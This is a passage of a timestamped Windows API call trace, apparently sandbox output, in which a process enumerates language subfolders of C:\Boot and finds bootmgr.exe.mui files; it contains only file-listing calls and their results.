lpFindFileData=0x2ee5b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0154.581] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.581] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 [0154.581] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0154.581] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0154.581] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-BR", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-BR", lpFilePart=0x0) returned 0xd [0154.581] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-BR\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-BR\\", lpFilePart=0x0) returned 0xe [0154.581] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.581] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.581] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0154.581] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0154.581] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.581] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 [0154.581] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0154.581] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0154.581] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-PT", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-PT", lpFilePart=0x0) returned 0xd [0154.581] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-PT\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-PT\\", lpFilePart=0x0) returned 0xe [0154.582] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.582] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.582] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0154.582] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0154.582] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.582] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 [0154.582] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0154.582] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0154.582] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-PT", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-PT", lpFilePart=0x0) returned 0xd [0154.582] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-PT\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-PT\\", lpFilePart=0x0) returned 0xe [0154.582] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.582] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.582] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0154.582] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0154.583] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.583] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 [0154.583] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0154.583] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0154.583] GetFullPathNameW (in: lpFileName="C:\\Boot\\ru-RU", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ru-RU", lpFilePart=0x0) returned 0xd [0154.583] GetFullPathNameW (in: lpFileName="C:\\Boot\\ru-RU\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ru-RU\\", lpFilePart=0x0) returned 0xe [0154.583] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.584] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.584] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0154.584] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0154.584] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.584] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 [0154.584] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0154.584] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0154.584] GetFullPathNameW (in: lpFileName="C:\\Boot\\ru-RU", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ru-RU", lpFilePart=0x0) returned 0xd [0154.584] GetFullPathNameW (in: lpFileName="C:\\Boot\\ru-RU\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ru-RU\\", lpFilePart=0x0) returned 0xe [0154.584] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.584] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.584] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0154.584] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0154.584] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.584] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 [0154.584] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0154.585] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0154.585] GetFullPathNameW (in: lpFileName="C:\\Boot\\sv-SE", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\sv-SE", lpFilePart=0x0) returned 0xd [0154.585] GetFullPathNameW (in: lpFileName="C:\\Boot\\sv-SE\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\sv-SE\\", lpFilePart=0x0) returned 0xe [0154.585] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.585] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.585] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0154.585] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0154.585] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.585] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 [0154.585] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0154.585] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0154.585] GetFullPathNameW (in: lpFileName="C:\\Boot\\sv-SE", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\sv-SE", lpFilePart=0x0) returned 0xd [0154.585] GetFullPathNameW (in: lpFileName="C:\\Boot\\sv-SE\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\sv-SE\\", lpFilePart=0x0) returned 0xe [0154.585] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.585] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.586] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0154.586] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0154.586] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.586] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 [0154.586] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0154.586] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0154.586] GetFullPathNameW (in: lpFileName="C:\\Boot\\tr-TR", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\tr-TR", lpFilePart=0x0) returned 0xd [0154.586] GetFullPathNameW (in: lpFileName="C:\\Boot\\tr-TR\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\tr-TR\\", lpFilePart=0x0) returned 0xe [0154.586] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.587] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.587] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0154.587] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0154.587] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.587] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 [0154.587] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0154.587] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0154.587] GetFullPathNameW (in: lpFileName="C:\\Boot\\tr-TR", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\tr-TR", lpFilePart=0x0) returned 0xd [0154.587] GetFullPathNameW (in: lpFileName="C:\\Boot\\tr-TR\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\tr-TR\\", lpFilePart=0x0) returned 0xe [0154.587] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.588] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, 